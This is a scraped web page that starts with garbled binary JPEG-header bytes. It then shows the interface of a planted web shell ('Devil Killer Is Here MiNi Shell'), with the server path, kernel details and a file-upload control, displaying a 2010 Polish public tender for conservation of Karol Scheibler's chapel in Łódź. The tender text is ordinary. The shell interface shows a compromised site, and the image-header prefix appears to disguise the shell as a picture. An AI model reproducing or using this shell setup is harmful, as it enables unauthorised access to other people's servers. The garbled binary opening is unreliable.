JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100722/221198-N-2010.html

<p class="kh_header"><b>Łódź: Konserwacja części górnej apsydy - fragment od strony wschodniej 
(II etap prac przy kaplicy nagrobnej Karola Scheiblera w Łodzi).</b><br>
<b>Numer ogłoszenia: 221198 - 2010; data zamieszczenia: 22.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja na rzecz Ratowania Kaplicy Karola Scheiblera , ul. Legionów 81, 91-072 Łódź, woj. łódzkie, tel. 042 6338023, faks 042 6338023.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.scheibler.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: fundacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja części górnej apsydy - fragment od strony wschodniej 
(II etap prac przy kaplicy nagrobnej Karola Scheiblera w Łodzi)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowych prac konserwatorskich - konserwacja części górnej apsydy - fragment od strony wschodniej kaplicy nagrobnej-mauzoleum Karola Scheiblera w Łodzi przy ul. Ogrodowej. Prace będą prowadzone na zabytku nieruchomym wpisanym do rejestru zabytków pod numerem A/12, na terenie nieruchomości dla której Sąd Rejonowy w Łodzi prowadzi księgę wieczystą nr 8489. Przedmiot zamówienia należy wykonać zgodnie z pozwoleniem Wojewódzkiego Konserwatora Zabytków Nr WUOZ/641/218/2007 z dnia 19 grudnia 2007 roku, pozwoleniem na budowę, dokumentacją projektową oraz specyfikacją techniczną - stanowiącymi integralną część specyfikacji istotnych warunków zamówienia, a także zgodnie z opracowanym przez wykonawcę szczegółowym programem prac konserwatorskich, na podstawie zakresu prac konserwatorskich.
Wykonawca zobowiązany jest do prowadzenia dziennika prac konserwatorskich oraz sporządzenia i przekazania Zamawiającemu dokumentacji konserwatorskiej, powykonawczej.
Wykonawca zobowiązany jest do udzielenia 36-miesięcznej gwarancji na cały zakres prac, licząc od daty odbioru robót.


W ofercie Wykonawca powinien zaproponować szczegółowy program prac konserwatorskich przygotowane na podstawie zakresu prac i wytycznych konserwatorskich w programie funkcjonalno-użytkowym stanowiącym integralną część Specyfikacji Istotnych Warunków Zamówienia.
Brak spełnienia ww. parametrów przez oferenta będzie podstawą odrzucenia oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem złożenia oferty jest wniesienie przed upływem terminu składania ofert wadium w wysokości: 3.900,00 złotych (słownie: trzy tysiące dziewięćset złotych). Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie wykonawcy przez zamawiającego z ubiegania się o zamówienie publiczne. Wadium może być wniesione przez jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia w imieniu pozostałych współwykonawców. Wadium musi być wniesione przez wykonawcę przed upływem terminu składania ofert, w jednej lub kilku dowolnie wybranych przez wykonawcę formach:
1)	pieniężnej - przelewem bankowym na wskazany w specyfikacji istotnych warunków zamówienia rachunek bankowy zamawiającego;
2)	poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancji bankowej;
4)	gwarancji ubezpieczeniowej;
5)	poręczenia udzielanego przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 ze zmianami).

Szczegółowe informacje na temat warunków uiszczenia wadium będą udostępnione w specyfikacji istotnych warunków zamówienia.

Całkowita wielkość lub zakres: zamówienie o wartości poniżej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wszystkie warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków (łącznie pozycje III.3.1 - III.3.5 w niniejszym ogłoszeniu - odpowiadające pozycjom w pkt. III.2.1 w ogłoszeniu na stronie Zamawiającego):

III.2.1. (numeracja według sygnatury zawartej w ogłoszeniu zamieszczonym na stronie Zamawiającego !) INFORMACJE DOTYCZĄCE SYTUACJI WYKONAWCY ORAZ INFORMACJE I FORMALNOŚCI NIEZBĘDNE DO OCENY, CZY SPEŁNIA ON MINIMALNE WYMOGI EKONOMICZNE, FINANSOWE I TECHNICZNE:



A.	O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają:

1) warunki wynikające z art. 22 ust. 1 ustawy prawo zamówień publicznych (w skrócie: pzp.);

2) posiadają kwalifikacje w zakresie prowadzenia robót o charakterze podobnym do przedmiotu niniejszego zamówienia, to znaczy:
2.1. dysponują potencjałem kadrowym posiadającym kwalifikacje i doświadczenie niezbędne do wykonywania prac w zakresie objętym zamówieniem: wymagane jest dysponowanie: 
2.1.1. ze względu na specyfikę przedmiotu zamówienia - zespołem konserwatorskim, w skład którego wejdą: 
* osoba przeznaczona do kierowania pracami konserwatorskimi przy Kaplicy nagrobnej-mauzoleum Karola Scheiblera w Łodzi, posiadająca dyplom ukończenia wyższych studiów na kierunku: konserwacja i restauracja dzieł sztuki o specjalności: konserwacja rzeźby kamiennej i elementów architektonicznych, z minimum 10-letnią praktykę konserwatorską w zakresie konserwacji rzeźby kamiennej i elementów architektonicznych (CV) i w okresie 5 lat poprzedzających publikację ogłoszenia o zamówieniu publicznym wykonała co najmniej po dwie odrębne prace konserwatorskiej z każdej z 3 grup [I - konserwacja zabytkowych kaplic nagrobnych, II- konserwacja kamiennych pomników nagrobnych, III- konserwacja fasad historycznych (zaprawa lub kamień lub cegła)] (Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i archeologicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych - Dz.U. 2004, Nr 150, poz. 1579),
* co najmniej jeden dyplomowany konserwator dzieł sztuki, ze specjalnością: konserwacji rzeźby kamiennej i elementów architektonicznych, którzy odbyli po uzyskaniu dyplomu co najmniej 12-miesięczną praktykę w konserwacji tych zabytków (Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i archeologicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych - Dz.U. 2004, Nr 150, poz. 1579), osoba ta wykonała w okresie 5 lat poprzedzających publikację ogłoszenia o zamówieniu publicznym co najmniej 4 prace o charakterze podobnym do przedmiotu zamówienia, tj. prace z dowolnych grup I - III [I - konserwacja zabytkowych kaplic nagrobnych, II- konserwacja kamiennych pomników nagrobnych, III- konserwacja fasad historycznych (zaprawa lub kamień lub cegła)].
* co najmniej jeden dyplomowany konserwator dzieł sztuki, ze specjalnością: konserwacji rzeźby kamiennej i elementów architektonicznych, którzy odbyli po uzyskaniu dyplomu co najmniej 12-miesięczną praktykę w konserwacji tych zabytków (Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i archeologicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych - Dz.U. 2004, Nr 150, poz. 1579), osoba ta wykonała w okresie 3 lat poprzedzających publikację ogłoszenia o zamówieniu publicznym co najmniej po 2 prace o charakterze podobnym do przedmiotu zamówienia, z grupy IV i z grupy V [IV - konserwacja witraży historycznych  V- szklenia ochronne witraży historycznych].
* co najmniej jeden dyplomowany konstruktor z uprawnieniami dot. konstrukcji obiektów zabytkowych oraz z minimum 10-letnią doświadczeniem przy konstrukcji budowli zabytkowych, który odbył po uzyskaniu dyplomu co najmniej 12 miesięczną praktykę w konserwacji tych zabytków. (Rozporządzenie Ministra Kultury z dn. 9 czerwca 2004 r, w sprawie prowadzenia prac konserwatorskich, restauratorskich, robot budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych. Dz. U.2004.150.1579.) 
3) posiadają doświadczenie w realizacji zamówień o podobnym charakterze:
3.1. zamówienie o podobnym charakterze: prace konserwatorskie w obiektach zabytkowych, znajdujących się w rejestrze zabytków polegające na wykonaniu konserwacji niżej oznaczonych typów obiektów - warunek minimum dopuszczenia do udziału w postępowaniu - zrealizowanie w ciągu ostatnich pięciu lat poprzedzających publikację ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót o podobnym charakterze z każdej z niżej oznaczonych 5 grup, potwierdzonych dokumentami, że zostały wykonane należycie przez WKZ (Wojewódzkiego Konserwatora Zabytków) lub MKZ (Miejskiego Konserwatora Zabytków):
- co najmniej dwa zamówienia z grupy I: konserwacja zabytkowych kaplic nagrobnych [Grupa I], każde o wartości brutto nie mniejszej niż 
650.000,00 złotych;
- co najmniej dwa zamówienia z grupy II- konserwacja kamiennych pomników nagrobnych [Grupa II], każde o wartości brutto nie mniejszej niż 100.000,00 złotych;
- co najmniej dwa zamówienia z grupy III- konserwacja fasad historycznych (zaprawa lub kamień lub cegła) [Grupa III], każde o wartości brutto nie mniejszej niż 150.000,00 złotych;
- co najmniej dwa zamówienia z grupy IV- konserwacja witraży historycznych [Grupa IV]. każde o wartości brutto nie mniejszej niż 150.000,00 złotych;
- co najmniej dwa zamówienia z grupy V- szklenia ochronne witraży historycznych [Grupa V].

4) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca musi spełniać następujące warunki: 
4.1. wykazać średnie roczne przychody netto ze sprzedaży w wysokości nie mniejszej niż    130 000 złotych w okresie ostatnich 3 lat obrotowych (tj. lat 2007, 2008, 2009), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.

5) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie przepisów art. 24 ust. 1 lub 2 pzp.
 
W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunki określone w pkt 2), 3) i 4) mogą być spełnione łącznie przez Wykonawców wspólnie ubiegających się o zamówienie. Pozostałe warunki musi spełniać każdy z Wykonawców. 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia, w oparciu o informacje (i ich weryfikację) zawarte w załączonych do wniosku dokumentach i oświadczeniach. Z treści tych dokumentów musi jednoznacznie wynikać, że wykonawca spełnia wszystkie warunki. Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza niż 5, zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki. W przypadku, gdy liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 5, zamawiający zastosuje dodatkową kwalifikację polegająca na przyznaniu wykonawcom po 1 pkt za każde dodatkowo wykonane ponad minimum kwalifikacyjne zamówienie polegające na wykonaniu robót wymienionych powyżej w pkt 3 [Grupy: I -V maksymalnie 5 pkt potwierdzone dokumentami świadczącymi o należytym wykonaniu wskazanego zamówienia i zaprosi do składania ofert wykonawców, którzy otrzymają największą ilość punktów podczas dodatkowej kwalifikacji. 
Za spełnienie warunków udziału w postępowaniu, Zamawiający uważać będzie:
a.	złożenie wniosku o dopuszczenie do udziału w postępowaniu (według wzoru formularza dostępnego na stronie internetowej Zamawiającego);
b.	dostarczenie wszystkich żądanych przez Zamawiającego dokumentów i oświadczeń w formie określonej przez Zamawiającego;
c.	spełnienie minimalnych warunków udziału w postępowaniu. 


Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.  


Wykonawca do wniosku zobowiązany jest załączyć:
1) oświadczenie o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych;
2) aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej z datą wystawienia nie wcześniejszą niż 6 miesięcy przed upływem terminu składania wniosku;
3) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, z datą wystawienia nie wcześniejszą niż 3 miesiące przed upływem terminu składania wniosku;
4) zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenia zdrowotne lub społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji, z datą wystawienia nie wcześniejszą niż 3 miesiące przed upływem terminu składania wniosku;
5) dyplomy ukończenia studiów osób oznaczonych w punkcie III.2.1.A.2 oraz oświadczenia o odbyciu przez te osoby, po uzyskaniu dyplomu 12-miesięcznej praktyki w konserwacji tych zabytków (nie dotyczy osoby oznaczonej w punkcie III.2.1.A.2.1.1 - kierownika, dla której należy przedłożyć: dyplom ukończenia studiów oraz oświadczenie o odbyciu po uzyskaniu dyplomu minimum 10-letniej praktyki konserwatorskiej w zakresie konserwacji i restauracji rzeźby kamiennej i detalu architektonicznego; oświadczenia - zobowiązania danych osób do pozostawania w dyspozycji wykonawcy przez okres do zakończenia realizacji zamówienia
6) potwierdzenie spełnienia przez kierownika (punkt III.2.1.A.2.1.1 - osoba przeznaczona do kierowania pracami konserwatorskimi) wymagań oznaczonych w punkcie III.2.1.A.2.1.1. w jednej z następujących form:
a) potwierdzenia wystawione przez właściwe miejscowo i rzeczowe dla danych prac służby konserwatorskie (Wojewódzki Konserwator Zabytków, Miejski Konserwator Zabytków) lub
b) protokoły końcowe, bezusterkowych odbiorów robót potwierdzone przez upoważnionych pracowników Miejskiego Konserwatora Zabytków lub Wojewódzkiego Konserwatora Zabytków;
7) wykaz wykonanych robót w okresie ostatnich pięciu lat przed dniem opublikowania ogłoszenia o zamówieniu publicznym, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem pracom stanowiącym przedmiot zamówienia. Dla każdej pracy w wykazie należy podać: a) nazwę zadania; b) wartość netto w PLN, c) opis prac z wyszczególnieniem warunków określonych przez Zamawiającego w poszczególnych grupach (punkt III.2.1.A.3 - grupy od I do V), d) data rozpoczęcia i zakończenia robót, e) miejsce wykonania, f) nazwa i adres zamawiającego, g) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, nazwę wykonawcy, który wykonywał dane zadanie. ich wartości oraz daty i miejsca wykonania, wraz z załączeniem dokumentów (protokołów końcowych bezusterkowych odbiorów robót lub potwierdzeń wystawionych przez służby konserwatorskie (Wojewódzki Konserwator Zabytków, Miejski Konserwator Zabytków) potwierdzających, że prace te zostały wykonane należycie (punk ten dotyczy dokumentowania spełnienia kryteriów z punktu III.2.1.A.3);
8) bilans oraz rachunek zysków i strat, a jeżeli podlega on badaniu przez biegłego rewidenta, zgodnie z przepisami o rachunkowości również z opinią o badanej w/w części sprawozdania, a w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające przychody - za ostatnie trzy lata obrotowe (tj. 2007, 2008, 2009), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (dotyczy kryterium oznaczonego w punkcie III.2.1.A.4); 

W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców:
 - dokument wymieniony w pkt. 1) może być złożony wspólnie, lecz w takim wypadku oświadczenie musi być podpisane przez pełnomocnika upoważnionego do ich reprezentowania w postępowaniu lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego albo przez upoważnionych przedstawicieli każdego z Wykonawców wspólnie ubiegających się o zamówienie. 
- dokument wymieniony w pkt. 2), 3), 4), 8) składa osobno każdy z wykonawców wspólnie ubiegających się o zamówienie; 
- dokumenty wymienione w pkt. 5), 6), 7) składa jeden lub więcej wykonawców wspólnie ubiegających się o zamówienie, którzy wykazują spełnienie warunku. 

Dokumenty winny być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

Wykonawca składa wniosek o dopuszczenie do udziału w postępowaniu, który musi być sporządzony w języku polskim, według wzoru dostępnego na stronie internetowej Zamawiającego (www.scheibler.org.pl). Wykonawca ma prawo złożyć tylko jeden wniosek, sam lub jako reprezentant firmy. Wykonawca, który przedłoży więcej niż jeden wniosek zostanie wykluczony z postępowania. Wniosek musi być podpisany przez osobę(y) upoważnioną(e) do reprezentowania Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają doświadczenie w realizacji zamówień o podobnym charakterze:

1. zamówienie o podobnym charakterze: prace konserwatorskie w obiektach zabytkowych, znajdujących się w rejestrze zabytków polegające na wykonaniu konserwacji niżej oznaczonych typów obiektów - warunek minimum dopuszczenia do udziału w postępowaniu - zrealizowanie w ciągu ostatnich pięciu lat poprzedzających publikację ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót o podobnym charakterze z każdej z niżej oznaczonych 5 grup, potwierdzonych dokumentami, że zostały wykonane należycie przez WKZ (Wojewódzkiego Konserwatora Zabytków) lub MKZ (Miejskiego Konserwatora Zabytków):
- co najmniej dwa zamówienia z grupy I: konserwacja zabytkowych kaplic nagrobnych [Grupa I], każde o wartości brutto nie mniejszej niż 
650.000,00 złotych;
- co najmniej dwa zamówienia z grupy II- konserwacja kamiennych pomników nagrobnych [Grupa II], każde o wartości brutto nie mniejszej niż 100.000,00 złotych;
- co najmniej dwa zamówienia z grupy III- konserwacja fasad historycznych (zaprawa lub kamień lub cegła) [Grupa III], każde o wartości brutto nie mniejszej niż 150.000,00 złotych;
- co najmniej dwa zamówienia z grupy IV- konserwacja witraży historycznych [Grupa IV]. każde o wartości brutto nie mniejszej niż 150.000,00 złotych;
- co najmniej dwa zamówienia z grupy V- szklenia ochronne witraży historycznych [Grupa V].</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. dysponują potencjałem kadrowym posiadającym kwalifikacje i doświadczenie niezbędne do wykonywania prac w zakresie objętym zamówieniem: wymagane jest dysponowanie: 
1.1. ze względu na specyfikę przedmiotu zamówienia - zespołem konserwatorskim, w skład którego wejdą: 
* osoba przeznaczona do kierowania pracami konserwatorskimi przy Kaplicy nagrobnej-mauzoleum Karola Scheiblera w Łodzi, posiadająca dyplom ukończenia wyższych studiów na kierunku: konserwacja i restauracja dzieł sztuki o specjalności: konserwacja rzeźby kamiennej i elementów architektonicznych, z minimum 10-letnią praktykę konserwatorską w zakresie konserwacji rzeźby kamiennej i elementów architektonicznych (CV) i w okresie 5 lat poprzedzających publikację ogłoszenia o zamówieniu publicznym wykonała co najmniej po dwie odrębne prace konserwatorskiej z każdej z 3 grup [I - konserwacja zabytkowych kaplic nagrobnych, II- konserwacja kamiennych pomników nagrobnych, III- konserwacja fasad historycznych (zaprawa lub kamień lub cegła)] (Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i archeologicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych - Dz.U. 2004, Nr 150, poz. 1579),
* co najmniej jeden dyplomowany konserwator dzieł sztuki, ze specjalnością: konserwacji rzeźby kamiennej i elementów architektonicznych, którzy odbyli po uzyskaniu dyplomu co najmniej 12-miesięczną praktykę w konserwacji tych zabytków (Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i archeologicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych - Dz.U. 2004, Nr 150, poz. 1579), osoba ta wykonała w okresie 5 lat poprzedzających publikację ogłoszenia o zamówieniu publicznym co najmniej 4 prace o charakterze podobnym do przedmiotu zamówienia, tj. prace z dowolnych grup I - III [I - konserwacja zabytkowych kaplic nagrobnych, II- konserwacja kamiennych pomników nagrobnych, III- konserwacja fasad historycznych (zaprawa lub kamień lub cegła)].
* co najmniej jeden dyplomowany konserwator dzieł sztuki, ze specjalnością: konserwacji rzeźby kamiennej i elementów architektonicznych, którzy odbyli po uzyskaniu dyplomu co najmniej 12-miesięczną praktykę w konserwacji tych zabytków (Rozporządzenie Ministra Kultury z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i archeologicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych - Dz.U. 2004, Nr 150, poz. 1579), osoba ta wykonała w okresie 3 lat poprzedzających publikację ogłoszenia o zamówieniu publicznym co najmniej po 2 prace o charakterze podobnym do przedmiotu zamówienia, z grupy IV i z grupy V [IV - konserwacja witraży historycznych  V- szklenia ochronne witraży historycznych].
